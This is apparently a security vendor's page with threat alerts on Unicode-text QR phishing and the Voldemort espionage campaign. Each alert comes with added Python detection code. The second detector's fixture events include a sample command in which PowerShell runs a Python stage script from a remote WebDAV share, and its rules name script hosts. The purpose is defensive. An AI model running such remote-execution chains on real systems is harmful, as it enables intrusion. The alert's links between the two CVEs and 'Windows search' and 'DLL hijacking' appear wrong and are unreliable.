SecOps & Risk mitigation
CyberProof uses OSINT and threat intelligence feeds for visibility into threats.
CyberProof’s adaptable playbooks address continuously evolving threats with updated strategies.
Professionals manage sophisticated networks, leveraging experience to counter advanced threats.
24/7 global SOC support ensures incident response with guaranteed SLA.
CyberProof develops recovery plans, restoring capabilities after a cyber incident.
Classify and manage enterprise assets, understanding risks and data sensitivity.
Non-destructive tests uncover potential exploits in assets and applications.
Mitigate security issues early with CyberProof’s training and awareness programs.
Rigorous security assessment for on-premises and cloud applications to ensure protection.
IAM manages user access and monitors it for anomalies to ensure security.
Cloud First approach ensures compliance and security within cloud environments.
Managed service for SIEM, EDR, MXDR, and threat intelligence solutions.
Identify, assess, and mitigate security vulnerabilities through regular scanning.
Partners
Case Studies
90% increase in visibility after deploying Microsoft XDR with CyberProof
Enterprise saves millions on data ingestion & storage following cloud migration.
International logistics company sees 40% savings in security operations costs
Threat Alerts
Unicode QR Code Scams: Bypassing Security with Invisible Threats
Researchers have discovered a new cyber threat called “Unicode QR Code Phishing”, where attackers use Unicode text characters to create QR codes that evade traditional image-based security measures. This technique takes advantage of the ubiquity of QR codes in digital interactions, which has led to a significant rise in QR code phishing attacks. Traditional defenses that scan for suspicious images are ineffective against this text-based approach. These Unicode QR codes can be scanned and function correctly on smartphones, yet look different in plain text, complicating their detection. The rise of this new threat, with a reported 587% increase in attacks, underscores the need for updated security strategies to address these sophisticated phishing techniques.
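Because the QR code in this technique is plain text rather than an image, a mail filter can look for it in the message body itself. The following is an added example written for this summary, not code from CyberProof or from the researchers who reported the technique: it flags runs of consecutive lines that consist almost entirely of Unicode block-element glyphs, which is what a text-rendered QR code looks like in an email body. The glyph set, the 80% density threshold and the eight-row minimum are assumptions chosen for the example, and the sample email is constructed.

```python
# Detect QR codes rendered as Unicode block characters in plain-text email bodies.
# Added example; the thresholds and glyph set below are assumptions, not vendor rules.

# Unicode "Block Elements" (U+2580..U+259F) plus a few geometric squares that
# text-based QR renderers commonly use for dark and light modules (assumption).
BLOCK_CHARS = {chr(cp) for cp in range(0x2580, 0x25A0)} | {"■", "□", "▪", "▫"}


def is_block_line(line, threshold=0.8):
    """True if at least `threshold` of the non-whitespace characters are block glyphs."""
    chars = [c for c in line if not c.isspace()]
    if not chars:
        return False
    hits = sum(1 for c in chars if c in BLOCK_CHARS)
    return hits / len(chars) >= threshold


def find_text_qr_blocks(text, min_rows=8):
    """
    Return (first_line, last_line, max_width) for every run of at least `min_rows`
    consecutive block-glyph lines. A single decorative line (a progress bar, a rule)
    does not qualify; a QR code rendered row by row does.
    """
    findings = []
    run_start, widths = None, []
    for i, line in enumerate(text.splitlines() + [""]):  # trailing "" flushes the last run
        if is_block_line(line):
            if run_start is None:
                run_start, widths = i, []
            widths.append(len(line.rstrip()))
        elif run_start is not None:
            if i - run_start >= min_rows:
                findings.append((run_start, i - 1, max(widths)))
            run_start = None
    return findings


# Constructed sample: a lure email with a ten-row "QR code" drawn in half-block glyphs.
# The pattern is illustrative only; it does not encode a real QR symbol.
QR_ROWS = [
    "█▀▀▀▀▀█ ▄█▄ █▀▀▀▀▀█",
    "█ ███ █ ▀▄▀ █ ███ █",
    "█▄▄▄▄▄█ ▄▀▄ █▄▄▄▄▄█",
    "▄▄▄▄▄▄▄ █▀▄ ▄▄▄▄▄▄▄",
    "▀█▄▀▄█▀▄▀▄▀█▄▀▄█▀▄▀",
    "▄▀▄▀█▄▀▄█▀▄▀▄█▀▄▀▄█",
    "█▀▀▀▀▀█ █▄▀ ▄▀█▄▀▄█",
    "█ ███ █ ▀▄█ █▀▄▀▄█▀",
    "█▄▄▄▄▄█ █▀▄ ▄█▀▄█▀▄",
    "▀▀▀▀▀▀▀ ▀▀▀ ▀▀▀▀▀▀▀",
]
SAMPLE_EMAIL = "\n".join(
    ["Your invoice is ready. Scan the code below to view it:"]
    + QR_ROWS
    + ["", "Thanks,", "Accounts Payable"]
)

if __name__ == "__main__":
    for start, end, width in find_text_qr_blocks(SAMPLE_EMAIL):
        print(f"possible text-rendered QR code at lines {start}-{end}, width {width}")
```

The check is deliberately independent of how the QR code was drawn (full blocks, half blocks or squares), because the point of the technique is that the rendering varies while the scanned result stays the same; a density-and-run heuristic catches all of them and leaves ordinary prose and one-line decorations alone.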
New Voldemort Espionage Campaign
Security researchers have identified a sophisticated malware campaign named “Voldemort”, which likely represents an espionage operation. The campaign employed a novel attack chain that blends commonly used techniques with less frequent methods like using Google Sheets for command and control (C&C) and abusing file schema URIs for malware staging. The malware exploits vulnerabilities such as CVE-2023-23397 (Windows search protocol) and CVE-2023-21716 (DLL hijacking) to infiltrate systems and execute malicious payloads. The campaign has targeted a wide range of organizations globally, posing a threat due to its advanced capabilities, especially in intelligence gathering.
The infection chain begins with phishing emails impersonating tax authorities from various countries, designed to deceive recipients into clicking on malicious links. These emails contain URLs that lead to a landing page hosted on InfinityFree, which checks the User Agent of the user’s browser. If the User Agent indicates a Windows environment, the browser is redirected to a search-ms URI, prompting the user to open Windows Explorer and load a file from a WebDAV share. This file, disguised as a local PDF, is actually a Windows shortcut (LNK) or ZIP file containing a similar LNK, which, when executed, invokes PowerShell to run Python scripts directly from the WebDAV share without downloading them locally.
The malware then collects system information, including the computer name, Windows version, and CPU details, sending this data to the attacker’s server. It downloads a decoy PDF to distract the user while extracting and executing a password-protected ZIP file containing a DLL vulnerable to side-loading via a legitimate executable. The DLL, named “Voldemort,” then connects to a Google Sheets-based C&C, where it uploads the user’s system information and awaits further commands.
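The chain described above leaves a recognisable trail in process-creation telemetry: a search-ms URI whose location points at a remote share, and a script host running content straight from a WebDAV path. The following added example, written for this summary and not code from CyberProof or the researchers who analysed the campaign, turns those two observations into simple triage rules and runs them over constructed process events. The event field names, the IP address 203.0.113.10 (a documentation range) and the share paths are all constructed for the example.

```python
# Triage rules for the search-ms / WebDAV stages of the chain described above.
# Added example; the event schema and sample data are constructed, not real telemetry.
import re

# A UNC path such as \\host\share or \\host@SSL\DavWWWRoot\share (assumed shape).
UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\')
# Markers that show a UNC path is being served over WebDAV by the Windows redirector.
WEBDAV_MARKERS = ("davwwwroot", "@ssl")
# Script hosts whose appearance next to a remote path is worth a closer look.
SCRIPT_HOSTS = ("powershell", "pwsh", "python", "cmd.exe", "wscript", "cscript")

RULE_SEARCH_MS = "search-ms URI pointing at a remote share"
RULE_SCRIPT_HOST = "script host executing from a UNC share"
RULE_WEBDAV = "WebDAV path in command line"


def classify_event(event):
    """Return the list of rule names that match one process-creation event."""
    cmd = event["cmdline"]
    lower = cmd.lower()
    remote = UNC_PATH.search(cmd) is not None
    hits = []
    if "search-ms:" in lower and remote:
        hits.append(RULE_SEARCH_MS)
    if remote and any(h in lower for h in SCRIPT_HOSTS):
        hits.append(RULE_SCRIPT_HOST)
    if remote and any(m in lower for m in WEBDAV_MARKERS):
        hits.append(RULE_WEBDAV)
    return hits


def triage(events):
    """Flatten matches into (timestamp, image, rule) tuples for an analyst queue."""
    return [(e["ts"], e["image"], rule) for e in events for rule in classify_event(e)]


# Constructed process-creation events loosely modelled on Sysmon Event ID 1 fields.
EVENTS = [
    {"ts": "2024-08-29T10:02:11Z", "parent": "outlook.exe", "image": "msedge.exe",
     "cmdline": 'msedge.exe "https://tax-portal.example.invalid/landing"'},
    {"ts": "2024-08-29T10:02:14Z", "parent": "msedge.exe", "image": "explorer.exe",
     "cmdline": 'explorer.exe "search-ms:query=TaxDoc&crumb=location:'
                '\\\\203.0.113.10@SSL\\DavWWWRoot\\share"'},
    {"ts": "2024-08-29T10:02:40Z", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe \\\\203.0.113.10@SSL\\DavWWWRoot\\share\\python.exe '
                '\\\\203.0.113.10@SSL\\DavWWWRoot\\share\\stage.py'},
    {"ts": "2024-08-29T10:05:00Z", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -File C:\\Scripts\\backup.ps1'},
]

if __name__ == "__main__":
    for ts, image, rule in triage(EVENTS):
        print(f"{ts} {image}: {rule}")
```

The local backup script in the last event produces no hit, which is the behaviour you want: PowerShell by itself is noise, PowerShell reading its program from a WebDAV share reached through a search-ms prompt is the signal the page describes.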